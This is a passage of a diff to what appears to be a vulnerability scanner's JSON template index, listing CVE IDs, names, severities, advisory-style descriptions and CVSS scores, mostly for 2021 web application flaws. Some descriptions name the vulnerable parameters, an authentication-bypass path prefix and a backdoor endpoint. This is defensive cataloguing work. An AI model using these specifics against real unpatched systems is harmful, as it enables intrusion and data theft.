- Open Redirect","Severity":"medium","Description":"Smartstore (aka \"SmartStoreNET\") before 4.1.0 contains an open redirect vulnerability via CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-36365.yaml"} -{"ID":"CVE-2020-36510","Info":{"Name":"WordPress 15Zine \u003c3.3.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress 15Zine before 3.3.0 is vulnerable to reflected cross-site scripting because the theme does not sanitize the cbi parameter before including it in the HTTP response via the cb_s_a AJAX action.\n","Classification":{"CVSSScore":"6.10"}},"file_path":"http/cves/2020/CVE-2020-36510.yaml"} +{"ID":"CVE-2020-36510","Info":{"Name":"WordPress 15Zine \u003c3.3.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress 15Zine before 3.3.0 is vulnerable to reflected cross-site scripting because the theme does not sanitize the cbi parameter before including it in the HTTP response via the cb_s_a AJAX action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-36510.yaml"} {"ID":"CVE-2020-4463","Info":{"Name":"IBM Maximo Asset Management Information Disclosure - XML External Entity Injection","Severity":"high","Description":"IBM Maximo Asset Management is vulnerable to an\nXML external entity injection (XXE) attack when processing XML data.\nA remote attacker could exploit this vulnerability to expose\nsensitive information or consume memory resources.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2020/CVE-2020-4463.yaml"} {"ID":"CVE-2020-5191","Info":{"Name":"PHPGurukul Hospital Management System - Cross-Site Scripting","Severity":"medium","Description":"PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-5191.yaml"} {"ID":"CVE-2020-5192","Info":{"Name":"Hospital Management System 4.0 - SQL Injection","Severity":"high","Description":"Hospital Management System 4.0 contains multiple SQL injection vulnerabilities because multiple pages and parameters do not validate user input. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-5192.yaml"} @@ -1045,6 +1065,7 @@ {"ID":"CVE-2021-24389","Info":{"Name":"WordPress FoodBakery \u003c2.2 - Cross-Site Scripting","Severity":"medium","Description":"WordPress FoodBakery before 2.2 contains an unauthenticated reflected cross-site scripting vulnerability. It does not properly sanitize the foodbakery_radius parameter before outputting it back in the response.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24389.yaml"} {"ID":"CVE-2021-24406","Info":{"Name":"WordPress wpForo Forum \u003c 1.9.7 - Open Redirect","Severity":"medium","Description":"WordPress wpForo Forum \u003c 1.9.7 is susceptible to an open redirect vulnerability because the plugin did not validate the redirect_to parameter in the login form of the forum, leading to an open redirect issue after a successful login.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24406.yaml"} {"ID":"CVE-2021-24407","Info":{"Name":"WordPress Jannah Theme \u003c5.4.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Jannah theme before 5.4.5 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24407.yaml"} +{"ID":"CVE-2021-24435","Info":{"Name":"WordPress Titan Framework plugin \u003c= 1.12.1 - Cross-Site Scripting","Severity":"medium","Description":"The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24435.yaml"} {"ID":"CVE-2021-24436","Info":{"Name":"WordPress W3 Total Cache \u003c2.1.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress W3 Total Cache plugin before 2.1.4 is susceptible to cross-site scripting within the extension parameter in the Extensions dashboard, which is output in an attribute without being escaped first. This can allow an attacker to convince an authenticated admin into clicking a link to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24436.yaml"} {"ID":"CVE-2021-24452","Info":{"Name":"WordPress W3 Total Cache \u003c2.1.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress W3 Total Cache plugin before 2.1.5 is susceptible to cross-site scripting via the extension parameter in the Extensions dashboard, when the setting 'Anonymously track usage to improve product quality' is enabled. The parameter is output in a JavaScript context without proper escaping. This can allow an attacker, who can convince an authenticated admin into clicking a link, to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24452.yaml"} {"ID":"CVE-2021-24472","Info":{"Name":"Onair2 \u003c 3.9.9.2 \u0026 KenthaRadio \u003c 2.0.2 - Remote File Inclusion/Server-Side Request Forgery","Severity":"critical","Description":"Onair2 \u003c 3.9.9.2 and KenthaRadio \u003c 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24472.yaml"} @@ -1054,7 +1075,9 @@ {"ID":"CVE-2021-24499","Info":{"Name":"WordPress Workreap - Remote Code Execution","Severity":"critical","Description":"WordPress Workreap theme is susceptible to remote code execution. The AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24499.yaml"} {"ID":"CVE-2021-24510","Info":{"Name":"WordPress MF Gig Calendar \u003c=1.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress MF Gig Calendar plugin 1.1 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize or escape the id GET parameter before outputting back in the admin dashboard when editing an event.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24510.yaml"} {"ID":"CVE-2021-24554","Info":{"Name":"WordPress Paytm Donation \u003c=1.3.2 - Authenticated SQL Injection","Severity":"high","Description":"WordPress Paytm Donation plugin through 1.3.2 is susceptible to authenticated SQL injection. The plugin does not sanitize, validate, or escape the id GET parameter before using it in a SQL statement when deleting donations. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-24554.yaml"} +{"ID":"CVE-2021-24647","Info":{"Name":"Pie Register \u003c 3.7.1.6 - Unauthenticated Arbitrary Login","Severity":"high","Description":"The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.1.7.6 has a flaw in the social login implementation, allowing unauthenticated attacker to login as any user on the site by only knowing their user ID or username\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2021/CVE-2021-24647.yaml"} {"ID":"CVE-2021-24666","Info":{"Name":"WordPress Podlove Podcast Publisher \u003c3.5.6 - SQL Injection","Severity":"critical","Description":"WordPress Podlove Podcast Publisher plugin before 3.5.6 is susceptible to SQL injection. The Social \u0026 Donations module, not activated by default, adds the REST route /services/contributor/(?P\u003cid\u003e[\\d]+) and takes id and category parameters as arguments. Both parameters can be exploited, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24666.yaml"} +{"ID":"CVE-2021-24731","Info":{"Name":"Pie Register \u003c 3.7.1.6 - SQL Injection","Severity":"critical","Description":"The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.7.1.6 does not properly escape user data before using it in a SQL statement in the wp-json/pie/v1/login REST API endpoint, leading to an SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24731.yaml"} {"ID":"CVE-2021-24746","Info":{"Name":"WordPress Sassy Social Share Plugin \u003c3.3.40 - Cross-Site Scripting","Severity":"medium","Description":"WordPress plugin Sassy Social Share \u003c 3.3.40 contains a reflected cross-site scripting vulnerability.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24746.yaml"} {"ID":"CVE-2021-24750","Info":{"Name":"WordPress Visitor Statistics (Real Time Traffic) \u003c4.8 -SQL Injection","Severity":"high","Description":"WordPress Visitor Statistics (Real Time Traffic) plugin before 4.8 does not properly sanitize and escape the refUrl in the refDetails AJAX action, which is available to any authenticated user. This could allow users with a role as low as subscriber to perform SQL injection attacks.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2021/CVE-2021-24750.yaml"} {"ID":"CVE-2021-24762","Info":{"Name":"WordPress Perfect Survey\u003c1.5.2 - SQL Injection","Severity":"critical","Description":"Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24762.yaml"} @@ -1088,7 +1111,7 @@ {"ID":"CVE-2021-25085","Info":{"Name":"WOOF WordPress plugin - Cross-Site Scripting","Severity":"medium","Description":"The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25085.yaml"} {"ID":"CVE-2021-25099","Info":{"Name":"WordPress GiveWP \u003c2.17.3 - Cross-Site Scripting","Severity":"medium","Description":"WordPress GiveWP plugin before 2.17.3 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the form_id parameter before returning it in the response of an unauthenticated request via the give_checkout_login AJAX action. An attacker can inject arbitrary script in the browser of a user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25099.yaml"} {"ID":"CVE-2021-25104","Info":{"Name":"WordPress Ocean Extra \u003c1.9.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Ocean Extra plugin before 1.9.5 contains a cross-site scripting vulnerability. The plugin does not escape generated links which are then used when the OceanWP theme is active.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25104.yaml"} -{"ID":"CVE-2021-25111","Info":{"Name":"WordPress English Admin \u003c1.5.2 - Open Redirect","Severity":"medium","Description":"WordPress English Admin plugin before 1.5.2 contains an open redirect vulnerability. The plugin does not validate the admin_custom_language_return_url before redirecting users to it. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.10"}},"file_path":"http/cves/2021/CVE-2021-25111.yaml"} +{"ID":"CVE-2021-25111","Info":{"Name":"WordPress English Admin \u003c1.5.2 - Open Redirect","Severity":"medium","Description":"WordPress English Admin plugin before 1.5.2 contains an open redirect vulnerability. The plugin does not validate the admin_custom_language_return_url before redirecting users to it. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25111.yaml"} {"ID":"CVE-2021-25112","Info":{"Name":"WordPress WHMCS Bridge \u003c6.4b - Cross-Site Scripting","Severity":"medium","Description":"WordPress WHMCS Bridge plugin before 6.4b contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the error parameter before outputting it back in the admin dashboard.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25112.yaml"} {"ID":"CVE-2021-25114","Info":{"Name":"WordPress Paid Memberships Pro \u003c2.6.7 - Blind SQL Injection","Severity":"critical","Description":"WordPress Paid Memberships Pro plugin before 2.6.7 is susceptible to blind SQL injection. The plugin does not escape the discount_code in one of its REST routes before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-25114.yaml"} {"ID":"CVE-2021-25118","Info":{"Name":"Yoast SEO 16.7-17.2 - Information Disclosure","Severity":"medium","Description":"Yoast SEO plugin 16.7 to 17.2 is susceptible to information disclosure, The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints, which can help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2021/CVE-2021-25118.yaml"} @@ -1113,9 +1136,15 @@ {"ID":"CVE-2021-26723","Info":{"Name":"Jenzabar 9.2x-9.2.2 - Cross-Site Scripting","Severity":"medium","Description":"Jenzabar 9.2.x through 9.2.2 contains a cross-site scripting vulnerability. It allows /ics?tool=search\u0026query.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-26723.yaml"} {"ID":"CVE-2021-26812","Info":{"Name":"Moodle Jitsi Meet 2.7-2.8.3 - Cross-Site Scripting","Severity":"medium","Description":"Moodle Jitsi Meet 2.7 through 2.8.3 plugin contains a cross-site scripting vulnerability via the \"sessionpriv.php\" module. This allows attackers to craft a malicious URL, which when clicked on by users, can inject JavaScript code to be run by the application.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-26812.yaml"} {"ID":"CVE-2021-26855","Info":{"Name":"Microsoft Exchange Server SSRF Vulnerability","Severity":"critical","Description":"This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-26855.yaml"} +{"ID":"CVE-2021-27124","Info":{"Name":"Doctor Appointment System 1.0 - SQL Injection","Severity":"medium","Description":"SQL injection in the expertise parameter in search_result.php in Doctor Appointment System v1.0.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-27124.yaml"} {"ID":"CVE-2021-27132","Info":{"Name":"Sercomm VD625 Smart Modems - CRLF Injection","Severity":"critical","Description":"Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to Carriage Return Line Feed (CRLF) injection via the Content-Disposition header.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-27132.yaml"} {"ID":"CVE-2021-27309","Info":{"Name":"Clansphere CMS 2011.4 - Cross-Site Scripting","Severity":"medium","Description":"Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the \"module\" parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-27309.yaml"} {"ID":"CVE-2021-27310","Info":{"Name":"Clansphere CMS 2011.4 - Cross-Site Scripting","Severity":"medium","Description":"Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the \"language\" parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-27310.yaml"} +{"ID":"CVE-2021-27314","Info":{"Name":"Doctor Appointment System 1.0 - SQL Injection","Severity":"critical","Description":"SQL injection in admin.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via username parameter at login page.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-27314.yaml"} +{"ID":"CVE-2021-27315","Info":{"Name":"Doctor Appointment System 1.0 - SQL Injection","Severity":"high","Description":"Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via the comment parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-27315.yaml"} +{"ID":"CVE-2021-27316","Info":{"Name":"Doctor Appointment System 1.0 - SQL Injection","Severity":"high","Description":"Blind SQL injection in contactus.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via lastname parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-27316.yaml"} +{"ID":"CVE-2021-27319","Info":{"Name":"Doctor Appointment System 1.0 - SQL Injection","Severity":"high","Description":"Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via email parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-27319.yaml"} +{"ID":"CVE-2021-27320","Info":{"Name":"Doctor Appointment System 1.0 - SQL Injection","Severity":"high","Description":"Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via firstname parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-27320.yaml"} {"ID":"CVE-2021-27330","Info":{"Name":"Triconsole Datepicker Calendar \u003c3.77 - Cross-Site Scripting","Severity":"medium","Description":"Triconsole Datepicker Calendar before 3.77 contains a cross-site scripting vulnerability in calendar_form.php. Attackers can read authentication cookies that are still active, which can be used to perform further attacks such as reading browser history, directory listings, and file contents.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-27330.yaml"} {"ID":"CVE-2021-27358","Info":{"Name":"Grafana Unauthenticated Snapshot Creation","Severity":"high","Description":"Grafana 6.7.3 through 7.4.1 snapshot functionality can allow an unauthenticated remote attacker to trigger a Denial of Service via a remote API call if a commonly used configuration is set.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-27358.yaml"} {"ID":"CVE-2021-27519","Info":{"Name":"FUDForum 3.1.0 - Cross-Site Scripting","Severity":"medium","Description":"FUDForum 3.1.0 contains a cross-site scripting vulnerability which allows remote attackers to inject JavaScript via index.php in the \"srch\" parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-27519.yaml"} @@ -1220,6 +1249,8 @@ {"ID":"CVE-2021-36749","Info":{"Name":"Apache Druid - Local File Inclusion","Severity":"medium","Description":"Apache Druid ingestion system is vulnerable to local file inclusion. The InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-36749.yaml"} {"ID":"CVE-2021-36873","Info":{"Name":"WordPress iQ Block Country \u003c=1.2.11 - Cross-Site Scripting","Severity":"medium","Description":"WordPress iQ Block Country plugin 1.2.11 and prior contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2021/CVE-2021-36873.yaml"} {"ID":"CVE-2021-37216","Info":{"Name":"QSAN Storage Manager \u003c3.3.3 - Cross-Site Scripting","Severity":"medium","Description":"QSAN Storage Manager before 3.3.3 contains a reflected cross-site scripting vulnerability. Header page parameters do not filter special characters. Remote attackers can inject JavaScript to access and modify specific data.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-37216.yaml"} +{"ID":"CVE-2021-37304","Info":{"Name":"Jeecg Boot \u003c= 2.4.5 - Information Disclosure","Severity":"high","Description":"An Insecure Permissions issue in jeecg-boot 2.4.5 allows unauthenticated remote attackers to gain escalated privilege and view sensitive information via the httptrace interface.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-37304.yaml"} +{"ID":"CVE-2021-37305","Info":{"Name":"Jeecg Boot \u003c= 2.4.5 - Sensitive Information Disclosure","Severity":"high","Description":"Jeecg Boot \u003c= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-37305.yaml"} {"ID":"CVE-2021-37416","Info":{"Name":"Zoho ManageEngine ADSelfService Plus \u003c=6103 - Cross-Site Scripting","Severity":"medium","Description":"Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-37416.yaml"} {"ID":"CVE-2021-37538","Info":{"Name":"PrestaShop SmartBlog \u003c4.0.6- SQL Injection","Severity":"critical","Description":"PrestaShop SmartBlog by SmartDataSoft \u003c 4.0.6 is vulnerable to a SQL injection vulnerability in the blog archive functionality.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-37538.yaml"} {"ID":"CVE-2021-37573","Info":{"Name":"Tiny Java Web Server - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) \u003c=1.115 allows an adversary to inject malicious code on the server's \"404 Page not Found\" error page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-37573.yaml"} @@ -1237,6 +1268,7 @@ {"ID":"CVE-2021-39144","Info":{"Name":"XStream 1.4.18 - Remote Code Execution","Severity":"high","Description":"XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted.\n","Classification":{"CVSSScore":"8.5"}},"file_path":"http/cves/2021/CVE-2021-39144.yaml"} {"ID":"CVE-2021-39146","Info":{"Name":"XStream 1.4.18 - Arbitrary Code Execution","Severity":"high","Description":"XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted.\n","Classification":{"CVSSScore":"8.5"}},"file_path":"http/cves/2021/CVE-2021-39146.yaml"} {"ID":"CVE-2021-39152","Info":{"Name":"XStream \u003c1.4.18 - Server-Side Request Forgery","Severity":"high","Description":"XStream before 1.4.18 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream with a Java runtime version 14 to 8. This makes it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"8.5"}},"file_path":"http/cves/2021/CVE-2021-39152.yaml"} +{"ID":"CVE-2021-39165","Info":{"Name":"Cachet \u003c=2.3.18 - SQL Injection","Severity":"high","Description":"Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. The original repository of Cachet \u003chttps://github.com/CachetHQ/Cachet\u003e is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2021/CVE-2021-39165.yaml"} {"ID":"CVE-2021-39211","Info":{"Name":"GLPI 9.2/\u003c9.5.6 - Information Disclosure","Severity":"medium","Description":"GLPI 9.2 and prior to 9.5.6 is susceptible to information disclosure via the telemetry endpoint, which discloses GLPI and server information. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2021/CVE-2021-39211.yaml"} {"ID":"CVE-2021-39226","Info":{"Name":"Grafana Snapshot - Authentication Bypass","Severity":"high","Description":"Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accessing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key. If the snapshot is in public mode, unauthenticated users can delete snapshots by accessing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can also delete snapshots by accessing the endpoints /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snapshot/:key, regardless of whether or not the snapshot is set to public mode (disabled by default).","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2021/CVE-2021-39226.yaml"} {"ID":"CVE-2021-39312","Info":{"Name":"WordPress True Ranker \u003c2.2.4 - Local File Inclusion","Severity":"high","Description":"WordPress True Ranker before version 2.2.4 allows sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file via local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-39312.yaml"} @@ -1258,9 +1290,16 @@ {"ID":"CVE-2021-40856","Info":{"Name":"Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass","Severity":"high","Description":"Auerswald COMfortel 1400/2600/3600 IP is susceptible to an authentication bypass vulnerability. Inserting the prefix \"/about/../\" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-40856.yaml"} {"ID":"CVE-2021-40859","Info":{"Name":"Auerswald COMpact 5500R 7.8A and 8.0B Devices Backdoor","Severity":"critical","Description":"Auerswald COMpact 5500R 7.8A and 8.0B devices contain an unauthenticated endpoint (\"https://192.168.1[.]2/about_state\"), enabling the bad actor to gain backdoor access to a web interface that allows for resetting the administrator password.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-40859.yaml"} {"ID":"CVE-2021-40868","Info":{"Name":"Cloudron 6.2 Cross-Site Scripting","Severity":"medium","Description":"In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-40868.yaml"} -{"ID":"CVE-2021-40870","Info":{"Name":"Aviatrix Controller 6.x before 6.5-1804.1922 Remote Command Execution","Severity":"critical","Description":"Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-40870.yaml"} +{"ID":"CVE-2021-40870","Info":{"Name":"Aviatrix Controller 6.x before 6.5-1804.1922 - Remote Command Execution","Severity":"critical","Description":"Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-40870.yaml"} {"ID":"CVE-2021-40875","Info":{"Name":"Gurock TestRail Application files.md5 Exposure","Severity":"high","Description":"Improper access control in Gurock TestRail versions \u003c 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths which can then be tested, and in some cases result in the disclosure of hardcoded credentials, API keys, or other sensitive data.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-40875.yaml"} +{"ID":"CVE-2021-40908","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"SQL injection vulnerability in Login.php in Sourcecodester Purchase Order Management System v1 by oretnom23, allows attackers to execute arbitrary SQL commands via the username parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-40908.yaml"} {"ID":"CVE-2021-40960","Info":{"Name":"Galera WebTemplate 1.0 Directory Traversal","Severity":"critical","Description":"Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-40960.yaml"} +{"ID":"CVE-2021-40968","Info":{"Name":"Spotweb \u003c= 1.5.1 - Cross Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword2 parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-40968.yaml"} +{"ID":"CVE-2021-40969","Info":{"Name":"Spotweb \u003c= 1.5.1 - Cross Site Scripting (Reflected)","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the firstname parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-40969.yaml"} +{"ID":"CVE-2021-40970","Info":{"Name":"Spotweb \u003c= 1.5.1 - Cross Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the username parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-40970.yaml"} +{"ID":"CVE-2021-40971","Info":{"Name":"Spotweb \u003c= 1.5.1 - Cross Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in 